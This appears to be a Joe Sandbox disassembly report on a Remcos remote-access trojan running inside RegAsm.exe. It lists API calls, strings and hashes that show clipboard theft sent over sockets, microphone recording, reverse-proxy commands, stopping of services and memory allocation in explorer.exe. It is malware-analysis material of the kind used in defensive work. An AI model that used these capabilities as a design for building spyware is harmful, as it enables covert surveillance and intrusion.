                                                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                          • API String ID: 2956720200-749203953
                                                                                                                          • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                          • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                          • String ID: 0VG$0VG$<$@$Temp
                                                                                                                          • API String ID: 1704390241-2575729100
                                                                                                                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                          APIs
                                                                                                                          • OpenClipboard.USER32 ref: 0041697C
                                                                                                                          • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                          • GetClipboardData.USER32 ref: 004169A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                          • String ID: !D@
                                                                                                                          • API String ID: 2172192267-604454484
                                                                                                                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 221034970-0
                                                                                                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 004481B5
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 004481C1
                                                                                                                          • _free.LIBCMT ref: 004481CC
                                                                                                                          • _free.LIBCMT ref: 004481D7
                                                                                                                          • _free.LIBCMT ref: 004481E2
                                                                                                                          • _free.LIBCMT ref: 004481ED
                                                                                                                          • _free.LIBCMT ref: 004481F8
                                                                                                                          • _free.LIBCMT ref: 00448203
                                                                                                                          • _free.LIBCMT ref: 0044820E
                                                                                                                          • _free.LIBCMT ref: 0044821C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 100059EA
                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                          • _free.LIBCMT ref: 100059F6
                                                                                                                          • _free.LIBCMT ref: 10005A01
                                                                                                                          • _free.LIBCMT ref: 10005A0C
                                                                                                                          • _free.LIBCMT ref: 10005A17
                                                                                                                          • _free.LIBCMT ref: 10005A22
                                                                                                                          • _free.LIBCMT ref: 10005A2D
                                                                                                                          • _free.LIBCMT ref: 10005A38
                                                                                                                          • _free.LIBCMT ref: 10005A43
                                                                                                                          • _free.LIBCMT ref: 10005A51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Eventinet_ntoa
                                                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                          • API String ID: 3578746661-3604713145
                                                                                                                          • Opcode ID: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                          • Opcode Fuzzy Hash: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                          APIs
                                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DecodePointer
                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                          • API String ID: 1462127192-2001430897
                                                                                                                          • Opcode ID: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                                                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                          • Opcode Fuzzy Hash: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                                                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentProcess
                                                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                          • API String ID: 2050909247-4242073005
                                                                                                                          • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                          • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                          APIs
                                                                                                                          • _strftime.LIBCMT ref: 00401D50
                                                                                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                          • API String ID: 3809562944-243156785
                                                                                                                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                          APIs
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                          • String ID: ,kG$0kG
                                                                                                                          • API String ID: 3815856325-2015055088
                                                                                                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                          • waveInStart.WINMM ref: 00401CFE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                          • String ID: 02x$dMG$|MG
                                                                                                                          • API String ID: 1356121797-3767803055
                                                                                                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                          • GetMessageA.USER32 ref: 0041D591
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                          • String ID: Remcos
                                                                                                                          • API String ID: 1970332568-165870891
                                                                                                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                          APIs
                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                          • __freea.LIBCMT ref: 00454083
                                                                                                                          • __freea.LIBCMT ref: 0045408F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 201697637-0
                                                                                                                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                          • _free.LIBCMT ref: 00445515
                                                                                                                          • _free.LIBCMT ref: 0044552E
                                                                                                                          • _free.LIBCMT ref: 00445560
                                                                                                                          • _free.LIBCMT ref: 00445569
                                                                                                                          • _free.LIBCMT ref: 00445575
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
